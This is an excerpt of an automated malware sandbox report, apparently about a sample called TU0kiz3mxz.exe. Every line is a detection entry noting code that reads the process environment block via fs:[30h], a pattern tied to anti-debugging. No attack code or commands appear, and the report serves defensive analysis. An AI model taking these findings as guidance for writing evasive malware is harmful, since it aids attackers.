          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156030 mov eax, dword ptr fs:[00000030h]3_2_01156030
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA020 mov eax, dword ptr fs:[00000030h]3_2_010BA020
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC020 mov eax, dword ptr fs:[00000030h]3_2_010BC020
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146050 mov eax, dword ptr fs:[00000030h]3_2_01146050
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2050 mov eax, dword ptr fs:[00000030h]3_2_010C2050
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EC073 mov eax, dword ptr fs:[00000030h]3_2_010EC073
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C208A mov eax, dword ptr fs:[00000030h]3_2_010C208A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011860B8 mov eax, dword ptr fs:[00000030h]3_2_011860B8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011860B8 mov ecx, dword ptr fs:[00000030h]3_2_011860B8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011580A8 mov eax, dword ptr fs:[00000030h]3_2_011580A8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011420DE mov eax, dword ptr fs:[00000030h]3_2_011420DE
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011020F0 mov ecx, dword ptr fs:[00000030h]3_2_011020F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C80E9 mov eax, dword ptr fs:[00000030h]3_2_010C80E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]3_2_010BA0E3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011460E0 mov eax, dword ptr fs:[00000030h]3_2_011460E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC0F0 mov eax, dword ptr fs:[00000030h]3_2_010BC0F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC310 mov ecx, dword ptr fs:[00000030h]3_2_010BC310
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E0310 mov ecx, dword ptr fs:[00000030h]3_2_010E0310
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01168350 mov ecx, dword ptr fs:[00000030h]3_2_01168350
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov ecx, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118A352 mov eax, dword ptr fs:[00000030h]3_2_0118A352
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116437C mov eax, dword ptr fs:[00000030h]3_2_0116437C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E438F mov eax, dword ptr fs:[00000030h]3_2_010E438F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E438F mov eax, dword ptr fs:[00000030h]3_2_010E438F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011643D4 mov eax, dword ptr fs:[00000030h]3_2_011643D4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011643D4 mov eax, dword ptr fs:[00000030h]3_2_011643D4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov ecx, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011463C0 mov eax, dword ptr fs:[00000030h]3_2_011463C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117C3CD mov eax, dword ptr fs:[00000030h]3_2_0117C3CD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F63FF mov eax, dword ptr fs:[00000030h]3_2_010F63FF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B823B mov eax, dword ptr fs:[00000030h]3_2_010B823B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A250 mov eax, dword ptr fs:[00000030h]3_2_0117A250
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A250 mov eax, dword ptr fs:[00000030h]3_2_0117A250
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6259 mov eax, dword ptr fs:[00000030h]3_2_010C6259
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01148243 mov eax, dword ptr fs:[00000030h]3_2_01148243
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01148243 mov ecx, dword ptr fs:[00000030h]3_2_01148243
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA250 mov eax, dword ptr fs:[00000030h]3_2_010BA250
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B826B mov eax, dword ptr fs:[00000030h]3_2_010B826B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE284 mov eax, dword ptr fs:[00000030h]3_2_010FE284
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE284 mov eax, dword ptr fs:[00000030h]3_2_010FE284
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02A0 mov eax, dword ptr fs:[00000030h]3_2_010D02A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02A0 mov eax, dword ptr fs:[00000030h]3_2_010D02A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov ecx, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156500 mov eax, dword ptr fs:[00000030h]3_2_01156500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F4588 mov eax, dword ptr fs:[00000030h]3_2_010F4588
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2582 mov eax, dword ptr fs:[00000030h]3_2_010C2582
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2582 mov ecx, dword ptr fs:[00000030h]3_2_010C2582
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE59C mov eax, dword ptr fs:[00000030h]3_2_010FE59C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C65D0 mov eax, dword ptr fs:[00000030h]3_2_010C65D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C25E0 mov eax, dword ptr fs:[00000030h]3_2_010C25E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC427 mov eax, dword ptr fs:[00000030h]3_2_010BC427
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A456 mov eax, dword ptr fs:[00000030h]3_2_0117A456
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
